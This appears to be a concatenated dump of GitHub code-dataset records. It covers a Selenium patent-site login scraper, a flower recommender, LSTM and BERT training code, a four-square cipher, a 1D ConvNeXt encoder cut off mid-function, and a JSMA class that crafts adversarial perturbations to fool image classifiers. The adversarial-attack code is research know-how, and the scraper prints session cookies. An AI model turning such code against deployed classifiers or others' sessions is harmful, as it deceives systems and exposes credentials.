定时等待1秒\r\ntime.sleep(1)\r\n# 获取cookie,并把cookie转化为字符串格式\r\ncookie1 = str(driver.get_cookies())\r\nprint(cookie1)\r\n# 第二次用正则表达式,代码实现的功能就是看cookie里是否有tokenId这个词,如果有说明登录成功,跳出循环\r\nmatchObj = re.search(r'tokenId', cookie1, re.M | re.I)\r\nprint('登录成功')\r\n\r\ndriver.find_element(by=By.XPATH, value='/html/body/div[1]/div/div[2]/ul/li[2]/a').click()\r\ntime.sleep(1)\r\ndriver.find_element(by=By.XPATH, value='//*[@id=\"radioTypeCongregatePAVIEW\"]').click()\r\ndriver.find_element(by=By.ID, value='search_input').send_keys('huawei')\r\ndriver.find_element(by=By.XPATH, value='//*[@id=\"btn_generalSearch\"]').click()\r\n\r\ntime.sleep(100)\r\n","repo_name":"IcyScany/Python_Project","sub_path":"Web Spider/Login_try/code/Patent_login_old.py","file_name":"Patent_login_old.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24161454811","text":"import random\n\nimport pandas as pd\nfrom rake_nltk import Rake\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.feature_extraction.text import CountVectorizer\n\n\ndef recommend(caption):\n df = pd.read_csv(\"./diaries/views/flower.csv\")\n captioned_st = caption\n r = Rake()\n\n new_data = {\n \"f_name\": captioned_st,\n \"f_color\": \"n\",\n \"f_language\": captioned_st,\n \"f_property\": \"n\",\n }\n df = df.append(new_data, ignore_index=True)\n df[\"Key_words\"] = \"\"\n for _, row in df.iterrows():\n r.extract_keywords_from_text(row[\"f_language\"])\n key_words_dict_scores = r.get_word_degrees()\n row[\"Key_words\"] = list(key_words_dict_scores.keys())\n for _, row in df.iterrows():\n row[\"f_color\"] = [x.lower().replace(\" \", \"\") for x in row[\"f_color\"]]\n row[\"f_property\"] = [x.lower().replace(\" \", \"\") for x in row[\"f_property\"]]\n\n df[\"Merge_of_words\"] = \"\"\n columns = [\"f_color\", \"f_property\", \"Key_words\"]\n for _, row in df.iterrows():\n words = \"\"\n for col in columns:\n words += \" \".join(row[col]) + \" \"\n row[\"Merge_of_words\"] = words\n df = df[[\"f_name\", \"Merge_of_words\"]]\n\n count = CountVectorizer()\n count_matrix = count.fit_transform(df[\"Merge_of_words\"])\n cosine_sim = cosine_similarity(count_matrix, count_matrix)\n indices = pd.Series(df[\"f_name\"])\n recommended_flower = []\n idx = indices[indices == captioned_st].index[0]\n score_series = pd.Series(cosine_sim[idx]).sort_values(ascending=False)\n top_indices = list(score_series.iloc[1:2].index)\n rv=random.choice(top_indices)\n recommended_flower.append(list(df['f_name'])[rv])\n \n flower_num = df.index[df[\"f_name\"] == recommended_flower[0]].tolist()[0]\n if flower_num == 1:\n flower_num = random.choice(range(23))\n return flower_num\n\n","repo_name":"minicks/FlowerDiary","sub_path":"backend/diaries/views/recommend_flower.py","file_name":"recommend_flower.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"21526642772","text":"import numpy\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\nfrom keras.layers import LSTM\nfrom keras.callbacks import ModelCheckpoint\nfrom keras.utils import np_utils\n# Mediante los wrappers aplicamos GridSeach de SL a Keras\nfrom keras.wrappers.scikit_learn import KerasClassifier \nfrom sklearn.model_selection import GridSearchCV\n\n\n########################################\n###### DATA PREPROCESSING ##############\n########################################\n\n# load ascii text and covert to lowercase\nfilename = \"/home/trofficus/Desktop/twitter_project/Conocimiento/alice.txt\"\nraw_text = open(filename).read()\nraw_text = raw_text.lower()\n# create mapping of unique chars to integers\nchars = sorted(list(set(raw_text)))\nchar_to_int = dict((c, i) for i, c in enumerate(chars))\n# summarize the loaded data\nn_chars = len(raw_text)\nn_vocab = len(chars)\n# prepare the dataset of input to output pairs encoded as integers\nseq_length = 100\ndataX = []\ndataY = []\nfor i in range(0, n_chars - seq_length, 1):\n\tseq_in = raw_text[i:i + seq_length]\n\tseq_out = raw_text[i + seq_length]\n\tdataX.append([char_to_int[char] for char in seq_in])\n\tdataY.append(char_to_int[seq_out])\nn_patterns = len(dataX)\n# reshape X to be [samples, time steps, features]\nX = numpy.reshape(dataX, (n_patterns, seq_length, 1))\n# normalize\nX = X / float(n_vocab)\n# one hot encode the output variable\ny = np_utils.to_categorical(dataY)\n\n\n#############################################\n##### MODELING WITH LSTM (2 Layers) #########\n#############################################\n\n\n# We create a function to apply GridSearch\n\ndef model_generator(units, dropout, optimizer, activations):\n\tmodel = Sequential()\n\tmodel.add(LSTM(units, input_shape=(X.shape[1], X.shape[2]),\n\t\t\t\t\t\t activation=activations, return_sequences=True))\n\tmodel.add(Dropout(dropout))\n\tmodel.add(LSTM(units, activation = activations, return_sequences=True))\n\tmodel.add(Dropout(dropout))\n\tmodel.add(Dense(y.shape[1], activation='softmax'))\n\t\n\tmodel.compile(loss=\"categorical_crossentropy\", optimizer=optimizer,\n\t\t\t\t metrics=[\"accuracy\"])\n\treturn model\n\n\n# Let's set a collection of hyperparameters\n\nepochs = [20, 50, 100]\nbatch_size = [30, 60, 100]\nunits = [128, 256, 512]\nactivations = [\"relu\", \"tanh\", \"elu\"]\ndropout = [0.2, 0.3, 0.4]\noptimizer = [\"RMSprop\", \"Adam\"]\n\n\nparam_grid = dict(batch_size=batch_size, epochs=epochs, units=units, \n\t\t\t\t activations=activations, dropout=dropout,\n\t\t\t\t optimizer=optimizer)\n\nmodel = KerasClassifier(build_fn=model_generator, verbose=1)\n\ngrid = GridSearchCV(estimator=model, param_grid=param_grid, n_jobs=-1, verbose=1)\ngrid_result = grid.fit(X, y)\n\nbest_score = grid_result.best_score_\nbest_params = grid_result.best_params_\n\nprint(\"The best model has a score (Categorical crossentropy) of %f using this number of epochs: %s\" %(best_score, best_params))\n\n# Escribamos los resultados a un fucking fichero\n\nwith open(\"results.txt\", \"w\") as f:\n\tf.write(str(best_score))\n\tf.write(str(best_params))\n","repo_name":"MTrofficus/TheArtificialJesus","sub_path":"python_scripts/alice_lstm_2l.py","file_name":"alice_lstm_2l.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28874883495","text":"import tensorflow as tf\nimport numpy as np\n\nfrom adversarial_interface import AdversarialAttack\n\n\nclass JSMA(AdversarialAttack):\n\n def __init__(self, X, Y, channels, eps, model, clip_min=0.0, clip_max=1.0):\n super().__init__(eps, model)\n\n self.img_rows, self.img_cols = X, Y\n self.channels = channels\n\n self.clip_min = clip_min\n self.clip_max = clip_max\n\n self.name = \"Jacobian-based Saliecny Map Attack\"\n\n def __get_logits(self):\n self._model.layers[-1].activation = None\n\n def __compute_jacobian_matrix(self, input_image, target_image, y_inidx, y_tidx):\n self.__get_logits()\n\n logits = self._model(input_image)\n\n logits = np.array(tf.reshape(logits, (-1,)))\n logidx, logidx_target = logits[y_inidx], logits[y_tidx]\n\n jacobian, jacobian_target = np.gradient(input_image.ravel(), logidx), \\\n np.gradient(target_image.ravel(), logidx_target)\n\n return tf.cast(jacobian.reshape((1, self.img_cols, self.img_rows, self.channels)), tf.float32), \\\n tf.cast(jacobian_target.reshape((1, self.img_cols, self.img_rows, self.channels)), tf.float32)\n\n def __compute_saliency_map(self, input_image, dF_tX, dF_jX):\n # compute saliency map with respect to jacobian\n c1, c2 = tf.logical_or(self.eps < 0, input_image < self.clip_max), \\\n tf.logical_or(self.eps > 0, input_image > self.clip_min)\n\n sal1 = dF_tX >= 0\n sal2 = dF_jX <= 0\n\n shape = input_image.ravel().shape[0]\n\n condition = tf.cast(tf.reduce_all([c1, c2, sal1, sal2], axis=0), dtype=tf.float32)\n score_sm = condition * (dF_tX * tf.abs(dF_jX))\n\n score_sm = tf.reshape(score_sm, shape=[1, shape])\n return score_sm\n\n def adversarial_pattern(self, input_image, **kwargs):\n # generate adversarial perturbations\n max_iter, target_image, y_inidx, y_tidx = kwargs.get(\"max_iter\"), kwargs.get(\"target_image\"),\\\n kwargs.get(\"y_inidx\"), kwargs.get(\"y_tidx\")\n perturbations = []\n\n jacobian_input, jacobian_target = self.__compute_jacobian_matrix(input_image, target_image, y_inidx, y_tidx)\n jacobian_adv = jacobian_input - jacobian_target\n\n saliency_score = self.__compute_saliency_map(input_image, jacobian_target, jacobian_adv)\n shape = input_image.ravel().shape[0]\n update_map = np.ones((1, shape), dtype=np.float32)\n\n i = 0\n while i < max_iter:\n # self.eps = np.random.uniform(0.01, 2.5)\n idx = tf.argmax(saliency_score, axis=1)\n update_map[:, int(idx)] = 0.0\n update_map = tf.constant(update_map, dtype=tf.float32)\n saliency_score = saliency_score * update_map\n\n update_map = np.array(update_map, dtype=np.float32)\n perturbation = tf.one_hot(idx, shape, on_value=self.eps, off_value=0.0)\n perturbation = tf.reshape(perturbation, shape=tf.shape(input_image))\n\n perturbations.append(perturbation)\n i += 1\n\n pert_sum = tf.zeros((1, self.img_cols, self.img_rows, self.channels), dtype=tf.float32)\n for pert in perturbations:\n pert_sum += pert\n\n adversarial_image = tf.clip_by_value(tf.stop_gradient(input_image + pert_sum), self.clip_min, self.clip_max)\n\n return np.array(adversarial_image), np.array(pert_sum)\n","repo_name":"Dimanssional/Adversial-Attacks-Methods","sub_path":"Adversarial_Algorithms/jsma_method.py","file_name":"jsma_method.py","file_ext":"py","file_size_in_byte":3447,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13774805145","text":"# -*- coding:utf-8 -*-\n\n\"\"\"\n@ide: PyCharm\n@author: mesie\n@date: 2022/6/14 下午2:13\n@summary: Bert 模型\n\"\"\"\nimport torch\nfrom torch import nn\nfrom torch.nn import functional\nfrom transformers import BertForSequenceClassification\n\nclass BertModel(nn.Module):\n def __init__(self, model_path='bert-base-chinese'):\n super(BertModel, self).__init__()\n self.bert = BertForSequenceClassification.from_pretrained(model_path, num_labels=2) # /bert_pretrain/\n self.device = torch.device(\"cuda\")\n for param in self.bert.parameters():\n param.requires_grad = True # 每个参数都要 求梯度\n\n def forward(self, batch_seqs, batch_seq_masks, batch_seq_segments, labels):\n loss, logits = self.bert(input_ids=batch_seqs, attention_mask=batch_seq_masks,\n token_type_ids=batch_seq_segments, labels=labels)\n probabilities = functional.softmax(logits, dim=-1)\n return loss, logits, probabilities","repo_name":"littlemesie/text_match","sub_path":"models/bert.py","file_name":"bert.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23958504930","text":"import matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1 import host_subplot\nimport mpl_toolkits.axisartist as AA\nimport numpy as np\n\nax = host_subplot(111, axes_class=AA.Axes)\n\n# eje x\nini = 0\nfin = 16\nl = np.linspace(ini, fin, num=1e5)\n#figura\n#fig = plt.figure(edgecolor='w', facecolor='w', figsize=[20,5])\n\nwith plt.style.context('fivethirtyeight'):\n ax.plot(l, np.sin(l**2), lw=2, color='b')\n \nxlab = (r'$10^{6}$', r'$10^{4}$', r'$10^{2}$', r'$10^{0}$', r'$10^{-2}$', r'$10^{-4}$',\n r'$10^{-6}$', r'$10^{-8}$', r'$10^{-10}$', r'$10^{-12}$', r'$10^{-14}$')\nn = len(xlab)\nmed = float((fin-ini))/n\nloclab = [med/2]\nfor i in range(1,n):\n loclab.append(med/2 + i*med)\nplt.xticks(loclab, xlab)\nylim = [-1.25, 1.25]\nplt.ylim(ylim)\nplt.xlim([ini, fin])\nplt.yticks([0], ('0'))\nplt.tick_params(labelsize=20)\nplt.axes().set_axis_bgcolor('w')\nplt.grid('off', axis='y')\nplt.box('off'), \n#plt.title('Espectro electromagnetico'.decode('utf-8'), fontsize=22) \n\nax2 = ax.twin() # ax2 is responsible for \"top\" axis and \"right\" axis\nax2.set_xticks([0., .5*np.pi, np.pi, 1.5*np.pi, 2*np.pi])\nax2.set_xticklabels([\"texto\", r\"$\\frac{1}{2}\\pi$\",\n r\"$\\pi$\", r\"$\\frac{3}{2}\\pi$\", r\"$2\\pi$\"])\n\nax2.axis[\"right\"].major_ticklabels.set_visible(False)\n\n\n#plt.draw()\n#plt.show()\n","repo_name":"pap84/cim","sub_path":"rst/source/figures/cap2/fig1_bandas/bandas_3.py","file_name":"bandas_3.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"75147845584","text":"#!/usr/bin/env python3\nimport ciphers\nimport polybius\nimport os\n\nclass FourSquare(ciphers.Cipher):\n\tdef __init__(self, key1, key2, plaintext=\"\", ciphertext=\"\"):\n\t\tplaintext = plaintext.replace(\"J\", \"I\")\n\t\tsuper().__init__(plaintext, ciphertext)\n\t\t\n\t\tself._legal_chars.pop(self._legal_chars.index(\"J\"))\n\n\t\tif self._valid_values([self.plaintext, self.ciphertext, key1, key2], self._legal_chars):\n\t\t\traise ciphers.IllegalCharsError(\"Either the plaintext or ciphertext has illegal chars.\\nLegal chars: {}\".format(\"\".join(self._legal_chars)))\n\n\t\t#key1 used in top right square, key2 bottom left square\n\t\tself.key1 = key1\n\t\tself.key2 = key2\n\t\t\n\t\tself.ciphertext_squares = []\n\t\tself.plaintext_square = []\n\t\tself.plaintext_square_reverse = []\n\t\tself._create_squares()\n\t\tself._reverse_ciphertext_squares()\n\n\tdef encrypt(self):\n\t\t#repeates last char of plaintext if not an even length\n\t\tself.plaintext += self.plaintext[len(self.plaintext) - 1] if len(self.plaintext) % 2 != 0 else \"\"\n\t\tself.ciphertext = \"\"\n\n\t\tfor i in range(2, len(self.plaintext) + 1, 2):\n\t\t\tpair = self.plaintext[i - 2:i]\n\t\t\tpair = [self.plaintext_square[pair[0]], self.plaintext_square[pair[1]]]\n\t\t\tcipher_pair = [str(pair[0][0]) + str(pair[1][1]), str(pair[1][0]) + str(pair[0][1])]\n\t\t\tcipher_pair = self.ciphertext_squares_reverse[0][cipher_pair[0]] + self.ciphertext_squares_reverse[1][cipher_pair[1]]\n\t\t\tself.ciphertext += cipher_pair\n\t\treturn self.ciphertext\n\n\tdef decrypt(self):\n\t\tself.ciphertext += self.ciphertext[len(self.ciphertext) - 1] if len(self.ciphertext) % 2 != 0 else \"\"\n\t\tself.plaintext = \"\"\n\n\t\tfor i in range(2, len(self.ciphertext) + 1, 2):\n\t\t\tcipher_pair = self.ciphertext[i - 2: i]\n\t\t\tcipher_pair = [self.ciphertext_squares[0][cipher_pair[0]], self.ciphertext_squares[1][cipher_pair[1]]]\n\t\t\tpair = [str(cipher_pair[0][0]) + str(cipher_pair[1][1]), str(cipher_pair[1][0]) + str(cipher_pair[0][1])]\n\t\t\tpair = self.plaintext_square_reverse[pair[0]] + self.plaintext_square_reverse[pair[1]]\n\t\t\tself.plaintext += pair\n\t\treturn self.plaintext\n\n\tdef _reverse_ciphertext_squares(self):\n\t\tself.ciphertext_squares_reverse = [{}, {}]\n\n\t\tfor i in self.ciphertext_squares[0]:\n\t\t\tself.ciphertext_squares_reverse[0][self.ciphertext_squares[0][i]] = i\n\t\tfor i in self.ciphertext_squares[1]:\n\t\t\tself.ciphertext_squares_reverse[1][self.ciphertext_squares[1][i]] = i\n\n\tdef _create_squares(self):\n\t\t'''creates four 5x5 squares, one plaintext, two ciphertext,\n\t\talthough two plaintext are used in FourSquare one will be suffice.'''\n\t\t'''creates four 5x5 squares, one plaintext, two ciphertext,\n\t\talthough two plaintext are used in FourSquare one will be suffice.'''\n\t\t#creates plaintext sqaure\n\t\taxis = [x for x in range(5)]\n\t\tsqr = polybius.PolybiusSquare(x_values=axis, y_values=axis, sqr_values=self._legal_chars)\n\t\tsqr.create_square()\n\t\tself.plaintext_square = sqr.square\n\t\tself.plaintext_square_reverse = {self.plaintext_square[x]:x for x in self.plaintext_square}\n\n\t\t#exits method if ciphertext squares have been provided\n\t\tif self.ciphertext_squares: return None\n\n\t\tsqr_values_1 = list(self.key1)\n\t\tsqr_values_1.extend(self._legal_chars)\n\t\tsqr_values_1 = self._remove_duplicates(sqr_values_1)\n\n\t\tsqr_values_2 = list(self.key2)\n\t\tsqr_values_2.extend(self._legal_chars)\n\t\tsqr_values_2 = self._remove_duplicates(sqr_values_2)\n\n\t\t#if empty dict isnt passed for square, it fucks up - don't know why, yet - as the instance varibale\n\t\t#'square' acts like a class variable or like its static when the method create_square is called\n\t\t#it changes the value of the instance variable for every instance of the class PolybiusSquare.\n\t\tsqr1 = polybius.PolybiusSquare(x_values=axis, y_values=axis, sqr_values=sqr_values_1, square={})\n\t\tsqr1.create_square()\n\t\tself.ciphertext_squares.append(sqr1.square)\n\t\tsqr2 = polybius.PolybiusSquare(x_values=axis, y_values=axis, sqr_values=sqr_values_2, square={})\n\t\tsqr2.create_square()\n\t\tself.ciphertext_squares.append(sqr2.square)\n\n\tdef _remove_duplicates(self, x):\n\t\t'''returns a list with any duplicates removed'''\n\t\tin_list = []\n\t\tno_dupls = []\n\n\t\tfor i in range(len(x)):\n\t\t\ttry:\n\t\t\t\tif no_dupls.index(x[i]):\n\t\t\t\t\tpass\n\t\t\texcept ValueError:\n\t\t\t\tno_dupls.append(x[i])\n\t\t\t\tin_list.append(x[i])\n\n\t\treturn no_dupls\n\nif __name__ == '__main__':\n\tos.system(\"clear\")\n\tf = FourSquare(\"EXAMPLE\", \"KEYWORD\", ciphertext=\"TWSP\")\n\t#f.encrypt()\n\tf.decrypt()\n\tprint(f.plaintext)","repo_name":"murster972/ClassicalCiphers","sub_path":"four_square.py","file_name":"four_square.py","file_ext":"py","file_size_in_byte":4362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34134048628","text":"import pytest\nfrom unittest.mock import patch\nfrom nail.tools.debug_file import debug_file\n\n# Test data\nTEST_PROMPT = \"Fix any bugs in the file.\"\nTEST_MODIFIED_CONTENT = \"def test_function():\\n return 43\\n\"\n\n\n@pytest.fixture\ndef MockFileEditor():\n with patch(\"nail.tools.debug_file.FileEditor\", autospec=True) as mock:\n yield mock\n\n\n@pytest.fixture\ndef MockChat():\n with patch(\"nail.tools.debug_file.Chat\", autospec=True) as mock:\n mock_chat = mock.return_value\n mock_chat.predict_code.return_value = TEST_MODIFIED_CONTENT\n yield mock\n\n\n@pytest.fixture\ndef MockPrompt():\n with patch(\"nail.tools.debug_file.DebugPrompt\", autospec=True) as mock:\n mock_prompt = mock.return_value\n mock_prompt.text.return_value = TEST_PROMPT\n yield mock\n\n\n@pytest.mark.parametrize(\"error_message\", [None, \"error message\"])\ndef test_debug_file(MockFileEditor, MockChat, MockPrompt, error_message):\n mock_file_editor = MockFileEditor.return_value\n\n debug_file(\"test_file.py\", error_message)\n\n mock_file_editor.apply_changes.assert_called_once_with(TEST_MODIFIED_CONTENT)\n","repo_name":"edsaav/nail","sub_path":"tests/tools/test_debug.py","file_name":"test_debug.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"213990666","text":"class Protain:\n def __init__(self):\n self.constant_1 = 1.5\n self.constant_2 = 0.8\n\n def calc_protain(self, weight, y):\n \"\"\"\n This method to calculate the needed protain per person weight\n :param weight: the person weight\n :param y: the needed protain according to the persons goal\n :return: the needed protain per weight\n \"\"\"\n protain_you_need = 0\n if y == 1:\n protain_you_need += (weight * self.constant_1)\n elif y == 2:\n protain_you_need += (weight * self.constant_2)\n\n return protain_you_need\n","repo_name":"mukhtarabdelsalam/exam_project_nice_body","sub_path":"Protain.py","file_name":"Protain.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32004265482","text":"from collections import OrderedDict\n\nimport numpy as np\nimport pytorch_lightning as pl\nimport torch\nimport torch.nn.functional as F\nfrom torch import nn\n\n\n# ------------------------------------------------------------------------------\n# ConvNext1D Components\n# ------------------------------------------------------------------------------\nclass GlobalResponseNormalization(nn.Module):\n \"\"\"\n Adapted from https://github.com/facebookresearch/ConvNeXt-V2\n\n Inputs are expected to be of shape (batch_size, channels, spatial_dim),\n just as with conv1d layers.\n \"\"\"\n\n def __init__(self, dim):\n super(GlobalResponseNormalization, self).__init__()\n self.gamma = nn.Parameter(torch.zeros(1, dim, 1))\n self.beta = nn.Parameter(torch.zeros(1, dim, 1))\n\n def forward(self, x):\n # norm along spatial dimension then divide\n # that by mean along channel dimension\n Gx = torch.norm(x, p=2, dim=2, keepdim=True)\n Nx = Gx / (Gx.mean(dim=1, keepdim=True) + 1e-5)\n\n return self.gamma * x * Nx + self.beta + x\n\n\nclass DepthWiseConv1D(nn.Module):\n \"\"\"\n Depthwise convolution is grouped convolution where the number of groups\n is equal to the number of input channels. This is equivalent to applying\n a different kernel to each channel.\n \"\"\"\n\n def __init__(self, in_channels, out_channels, kernel_size):\n super(DepthWiseConv1D, self).__init__()\n self.depthwise = nn.Conv1d(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=kernel_size,\n groups=in_channels,\n padding=\"same\",\n )\n\n def forward(self, x):\n return self.depthwise(x)\n\n\nclass PointWiseConv1D(nn.Module):\n \"\"\"\n Pointwise convolution is a 1x1 convolution that is used to change the number\n of channels in a feature map.\n \"\"\"\n\n def __init__(self, in_channels, out_channels):\n super(PointWiseConv1D, self).__init__()\n self.pointwise = nn.Conv1d(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=1,\n )\n\n def forward(self, x):\n return self.pointwise(x)\n\n\nclass DownsampleConv1D(nn.Module):\n \"\"\"\n Downsampling applies a convolution with a large stride to reduce the\n spatial dimension of the input.\n \"\"\"\n\n def __init__(self, in_channels, out_channels, kernel_size=2):\n super(DownsampleConv1D, self).__init__()\n\n self.block = nn.Sequential(\n nn.GroupNorm(1, in_channels),\n nn.Conv1d(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=kernel_size,\n stride=kernel_size,\n ),\n )\n\n def forward(self, x):\n return self.block(x)\n\n\nclass ConvNext1DStem(nn.Module):\n \"\"\"\n Input stage of cnn that applies a downsample convolution followed by normalization.\n \"\"\"\n\n def __init__(\n self, in_channels=1, out_channels=32, in_kernel=7, downsample_kernel=4\n ):\n super(ConvNext1DStem, self).__init__()\n self.stem = nn.Sequential(\n nn.Conv1d(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=in_kernel,\n stride=1,\n padding=\"valid\",\n ),\n nn.GroupNorm(1, out_channels),\n nn.Conv1d(\n in_channels=out_channels,\n out_channels=out_channels,\n kernel_size=downsample_kernel,\n stride=downsample_kernel,\n ),\n nn.GroupNorm(1, out_channels),\n )\n\n def forward(self, x):\n return self.stem(x)\n\n\nclass ConvNext1DBlock(nn.Module):\n \"\"\"\n Main block of a ConvNext1D network. This block uses the inverted bottleneck\n configuration with skip connection and stochastic depth.\n \"\"\"\n\n def __init__(\n self,\n channels,\n kernel_size=7,\n bottleneck_factor=2,\n stride=1,\n stochastic_depth=0.1,\n ):\n super(ConvNext1DBlock, self).__init__()\n self.stochastic_depth = stochastic_depth\n\n self.block = nn.Sequential(\n DepthWiseConv1D(\n in_channels=channels,\n out_channels=channels,\n kernel_size=kernel_size,\n ),\n nn.GroupNorm(1, channels),\n PointWiseConv1D(\n in_channels=channels,\n out_channels=channels * bottleneck_factor,\n ),\n nn.GELU(),\n GlobalResponseNormalization(channels * bottleneck_factor),\n PointWiseConv1D(\n in_channels=channels * bottleneck_factor,\n out_channels=channels,\n ),\n )\n\n def forward(self, x):\n \"\"\"\n Forward pass of ConvNext1D with skip connection and stochastic depth\n (when training). Use the block path with probability {stochastic_depth}\n otherwise use just the identity path.\n \"\"\"\n # if self.training:\n # if np.random.rand() <= self.stochastic_depth:\n # return x\n # else:\n # return self.block(x) + x\n # else:\n # return self.block(x) + x\n return self.block(x) + x\n\n\nclass ConvNext1DStage(nn.Module):\n \"\"\"\n Stage of ConvNext1D that applies a downsample (if specified)\n followed by n_blocks X ConvNext1DBlock.\n \"\"\"\n\n def __init__(\n self,\n in_channels,\n out_channels,\n block_kernel_size=7,\n downsample_kernel_size: int | None = 2,\n n_blocks=3,\n bottleneck_factor=2,\n stochastic_depth=0.1,\n ):\n super(ConvNext1DStage, self).__init__()\n self.blocks = nn.Sequential()\n if downsample_kernel_size:\n self.blocks.append(\n DownsampleConv1D(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=downsample_kernel_size,\n )\n )\n self.blocks.append(\n nn.Sequential(\n *[\n ConvNext1DBlock(\n channels=out_channels,\n kernel_size=block_kernel_size,\n bottleneck_factor=bottleneck_factor,\n stochastic_depth=stochastic_depth,\n )\n for _ in range(n_blocks - 1)\n ],\n ConvNext1DBlock(\n channels=out_channels,\n kernel_size=block_kernel_size,\n bottleneck_factor=bottleneck_factor,\n stochastic_depth=0.0,\n ),\n )\n )\n\n def forward(self, x):\n return self.blocks(x)\n\n\nclass ConvNext1DEncoder(pl.LightningModule):\n def __init__(\n self,\n stem_kernel: int = 4,\n downsample_kernel: int = 2,\n block_kernel: int = 7,\n block_dims: list[int] = [128, 256, 512],\n n_blocks: list[int] = [2, 4, 2],\n stochastic_depths: list[float] = [0.25, 0.5, 0.25],\n ):\n \"\"\"\n Initialize the ConvNext1D encoder\n Params:\n stem_kernel: kernel size for the stem convolution\n downsample_kernel: kernel size for the downsample convolution, if None, then\n Then the stage will not downsample (eg in the first stage)\n block_kernel: kernel size for the ConvNext1DBlock depthwise convolution\n block_dims: List of dimensions for each stage.\n Last element it the encoder dimension.\n n_blocks: List of number of blocks for each stage\n stochastic_depths: List of stochastic depth values for each stage\n \"\"\"\n super(ConvNext1DEncoder, self).__init__()\n assert (\n len(block_dims) == len(n_blocks) == len(stochastic_depths)\n ), \"block_dims, n_blocks, and stochastic_depths must be the same length\"\n\n self.enc_dimension = block_dims[-1]\n\n # stem and first stage ----------------------------\n self.blocks = nn.Sequential(\n ConvNext1DStem(\n in_channels=1,\n out_channels=block_dims[0],\n in_kernel=stem_kernel,\n downsample_kernel=downsample_kernel,\n ),\n )\n self.blocks.append(\n ConvNext1DStage(\n in_channels=block_dims[0],\n out_channels=block_dims[0],\n block_kernel_size=block_kernel,\n downsample_kernel_size=None,\n n_blocks=n_blocks[0],\n stochastic_depth=stochastic_depths[0],\n )\n )\n\n # remaining stages --------------------------------\n for i in range(1, len(block_dims)):\n self.blocks.append(\n ConvNext1DStage(\n in_channels=block_dims[i - 1],\n out_channels=block_dims[i],\n block_kernel_size=block_kernel,\n downsample_kernel_size=downsample_kernel,\n n_blocks=n_blocks[i],\n stochastic_depth=stochastic_depths[i],\n )\n )\n\n # to embedding ------------------------------------\n self.blocks.append(\n nn.Sequential(\n nn.AdaptiveAvgPool1d(1),\n nn.GroupNorm(1, block_dims[-1]),\n nn.Flatten(start_dim=1),\n # TODO test without the linear output layer\n nn.Linear(block_dims[-1], block_dims[-1]),\n )\n )\n\n self.apply(self._init_weights)\n\n def forward(self, x):\n return self.blocks(x)\n\n def predict_step(self, batch, _):\n return self.forward(batch[\"P\"])\n\n def _init_weights(self, m, w_init=nn.init.trunc_normal_, b_init=nn.init.zeros_):\n \"\"\"\n The default init for pytorch seems to cause the beginning of training\n to be a bit suboptimal (uses Xavier?).\n \"\"\"\n if isinstance(m, nn.Conv1d):\n w_init(m.weight)\n if m.bias is not None:\n b_init(m.bias)\n\n\n# ------------------------------------------------------------------------------\n# regular convolutional network blocks\n# ------------------------------------------------------------------------------\nclass Conv1DBlock(nn.Module):\n \"\"\"Regular convolution with no skip connection\"\"\"\n\n def __init__(\n self,\n in_channels,\n out_channels,\n dropout=0.1,\n kernel_size=3,\n stride=1,\n padding=\"valid\",\n ):\n super(Conv1DBlock, self).__init__()\n self.conv = nn.Conv1d(\n in_channels=in_channels,\n out_channels=out_channels,\n kernel_size=kernel_size,\n stride=stride,\n padding=padding,\n )\n self.dropout = nn.Dropout(dropout)\n # self.norm = nn.GroupNorm(1, out_channels)\n self.norm = nn.BatchNorm1d(out_channels)\n self.act = nn.GELU()\n self.pool = nn.MaxPool1d(kernel_size=3, stride=1)\n\n def forward(self, x):\n x = self.conv(x)\n x = self.dropout(x)\n x = self.norm(x)\n x = self.act(x)\n x = self.pool(x)\n return x\n\n\nclass Conv1DEncoder(pl.LightningModule):\n \"\"\"\n Conv 1d model that takes in a sequence of genotypes (sparse with positional\n channel) and outputs an encoded N-dimensional vector representation.\n \"\"\"\n\n def __init__(\n self,\n in_channels=1,\n kernel_size=3,\n stride=1,\n n_layers=4,\n dropout=0.1,\n padding=\"valid\",\n enc_dimension=512,\n ):\n super().__init__()\n\n self.in_channels = in_channels\n self.enc_dimension = n_layers * 32\n self.kernel_size = kernel_size\n self.stride = stride\n self.n_layers = n_layers\n self.dropout = dropout\n self.padding = padding\n self.enc_dimension = enc_dimension\n\n self.conv_in = nn.Conv1d(\n in_channels=in_channels,\n out_channels=32,\n kernel_size=kernel_size,\n stride=stride,\n padding=padding,\n )\n\n self.conv_blocks = nn.ModuleList(\n [\n Conv1DBlock(\n in_channels=32 * i,\n out_channels=(i + 1) * 32,\n dropout=dropout,\n kernel_size=kernel_size,\n stride=stride,\n # padding=padding,\n )\n for i in range(1, n_layers)\n ]\n )\n\n # used to flatten the output of the conv blocks\n # TODO just use this as the output encoding and see what happens\n self.avg_pool = nn.AdaptiveAvgPool1d(1)\n\n self.fc = nn.Linear(n_layers * 32, enc_dimension)\n self.fc_dropout = nn.Dropout(dropout)\n\n self.apply(self._init_weights)\n\n def forward(self, x):\n x 